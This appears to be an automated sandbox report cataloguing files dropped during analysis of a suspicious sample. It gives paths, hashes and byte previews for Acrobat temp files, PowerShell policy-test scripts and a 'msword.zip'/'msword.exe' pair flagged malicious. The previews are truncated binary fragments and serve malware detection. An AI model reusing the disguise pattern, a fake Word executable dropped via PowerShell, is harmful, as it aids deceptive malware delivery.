Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltkqgvvt.f41.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqkvtknc.ud2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ri3hqers.0gt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxspbqns.yhr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9bao7z3_ea46zt_65c.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
Category:	dropped
Size (bytes):	144514
Entropy (8bit):	7.992637131260696
Encrypted:	true
SSDEEP:	3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
MD5:	BA1716D4FB435DA6C47CE77E3667E6A8
SHA1:	AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
SHA-256:	AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
SHA-512:	65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
Malicious:	false
Preview:	PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..\|....,.A.....Z..a<.C._..../G\|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.\|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r\|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?\|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9ljsanc_ea46zv_65c.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
Category:	dropped
Size (bytes):	144514
Entropy (8bit):	7.992637131260696
Encrypted:	true
SSDEEP:	3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
MD5:	BA1716D4FB435DA6C47CE77E3667E6A8
SHA1:	AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
SHA-256:	AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
SHA-512:	65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
Malicious:	false
Preview:	PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..\|....,.A.....Z..a<.C._..../G\|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.\|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r\|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?\|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-05 02-56-11-850.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.330589339471305
Encrypted:	false
SSDEEP:	384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink
MD5:	5BC0A308794F062FEC40F3016568DF9F
SHA1:	14149448191AB45E99011CBBEF39F2A9A03A0D15
SHA-256:	00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473
SHA-512:	CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242
Malicious:	false
Preview:	SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:171+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15099
Entropy (8bit):	5.3636345176651945
Encrypted:	false
SSDEEP:	384:mh6EGEjEOEaEPEODEDEsEcEhErmaQJQQGQzl5l7a5azwDCwDiwDpwDOwDmRhGh+n:mYF+NHEPDcFbEqRcQtC3R6+Zd2zZY8m6
MD5:	67A7DE06D4ACA646C92CAF6A7CD52ACD
SHA1:	C96EECCDB298DCB929B4780A5A0E3DA164887E4C
SHA-256:	25DE8D2752241CF0198DBA9D496113A2ABFFDB85EA3CFDEF7F0B61D405E81DAF
SHA-512:	EFBAC882671011160E21569A558C8EB51AF99AE0F3DB540FA8064B0D4B42AACA19E25271C202745286088EEC7C9A59E1FCDE9E66C30BFDDCFB6486DDE94FAED9
Malicious:	false
Preview:	SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:864-0500 ThreadID=8092 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:869-0500 ThreadID=8092 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:869-0500 ThreadID=8092 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:869-0500 ThreadID=8092 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:869-0500 ThreadID=8092 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.381709327968033
Encrypted:	false
SSDEEP:	192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmIcbGI9HcbN:8qnXopZ50rh9I
MD5:	081745E36032E9412FDF5E4560135B53
SHA1:	90BB58B0253F6E970BFE7CC577EAD55C1160F377
SHA-256:	5C7653E519FEA75CDA22202D693D449E282316CE097C20590813EBBC91A6EF82
SHA-512:	3452CEE35B18747C7296FCBDCE18F3ACE6446C26E384D0122060231AC1A38B1E053492141F094FA7AAC84ADE382E8BFF2A07E75CF640CCB3F8D98ADC14DB38B3
Malicious:	false
Preview:	05-10-2023 10:01:02:.---2---..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:01:02:.Closing File..05-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\0071ba63-a290-466d-885a-a026a0380b20.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\58ea8419-6f5d-4d33-a236-86a8eabacbed.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
MD5:	716C2C392DCD15C95BBD760EEBABFCD0
SHA1:	4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
SHA-256:	DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
SHA-512:	E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\7b9f42f0-0194-4a6e-bdcc-49d3c09e558f.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
MD5:	18E3D04537AF72FDBEB3760B2D10C80E
SHA1:	B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
SHA-256:	BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
SHA-512:	2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\dc1a067b-8c08-41f7-ac41-b01babc79261.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\msword.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3511922
Entropy (8bit):	6.32262550846943
Encrypted:	false
SSDEEP:	49152:BZH8MW3UdWJhVmT6CpvDjgYDlw0kr1LKEKNoCo:/H8ZZvVopvgYD/kJLKEqu
MD5:	EF2620F66230219A51A6C2055066C3C3
SHA1:	394657C478086158830BE943C09630488BE56366
SHA-256:	B9C27330ED8EAE02A918901435A2D1F98EE20CB2390D9F69FC45A043F2009A5B
SHA-512:	C20357671E243AAD4A68251A6C49EC9BD69FBFBEF104BD73CA6903003D558159C2B5417924CC6228FBB5A8750FE3F24246C8A7686A823E27E7DB80EAE351023A
Malicious:	true
Preview:	PK...........Y'4....5...@.....msword.exe..\|..?>.#..6...F........K\...!.....%@-..J-.f.[.I'k..UD.....-m.W{..+b....6...b.H...u.......9....{...z......d...y...g...7.6A..H.!.....+.....F]..Q.K#.4...O.o..^S.j.w.....)..7...r.w..V.-....[.%.......f...w.......s..\.;uf!/.>.7.....#...v.{.....oI./.S.'..,....o...V.HK. .x..%.s.....B.H-.f..9...._.o..9../A.7..R......... ..)......+x/MM@f.Cxr....o#.m.....w...=.Z0......`.i.W\|S.. .[&.k........4...l...&p....S..i.f.....:....5P..kV..y.'.A...W_n.yW..hxPD......_m7W....W...>.o.Z...2...}.J.Z]...^.x..U....2...8..G6y....A.....P...6.x.FT.w.......3.D.^.R.J.....aJ.[.W.a....\.g.....24.K\|..........+.C..~fkG..Gq.6.v#..& ..s...G..0...h..QT..T_...h&DN..i@d(..~.....L\|.^.0.....]...F...B.X....QK..w...;}...(....vQ.(.m#.K.....qP*A....\..1...3:Q.....s(_...v....A_Pjo..>.w..W....6.c`.U..#........]S..}.n..WZ.A.1.n.m..........v.%I.@.K.....7.....ZqU.u1.X..eKw.i.kj....O...w.P+.I..............;.<.w.V..)....6...b....Z.....V....E..L.h..6.78

C:\Users\user\AppData\Local\Temp\msword\msword.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	524295939
Entropy (8bit):	4.230594067417474
Encrypted:	false
SSDEEP:
MD5:	6BCF42715FD1768FE1013C702612D0EE
SHA1:	D7AFFE603F5D7BBCA046AA4AB26BFA458C30C348
SHA-256:	71A2295583DB11053AC6D0A6770199352BC2F549212548D362E56258EE1CDD50
SHA-512:	E749B377C6B19BF8FC42C06FEF9A81024E66B190439260F7A7474EEED8A78E2FA2EA56614ACEB37110AC4ABA2772FDB144965CF99E091EFB39D444DAA2DA839F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p......r.....@.................................@...........BU............@......`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...BU.......V..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	98682
Entropy (8bit):	6.445287254681573
Encrypted:	false
SSDEEP:	1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
MD5:	7113425405A05E110DC458BBF93F608A
SHA1:	88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
SHA-256:	7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
SHA-512:	6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
Malicious:	false
Preview:	0...u0...\...0....H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...\|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	737
Entropy (8bit):	7.501268097735403
Encrypted:	false
SSDEEP:	12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
MD5:	5274D23C3AB7C3D5A4F3F86D4249A545
SHA1:	8A3778F5083169B281B610F2036E79AEA3020192
SHA-256:	8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
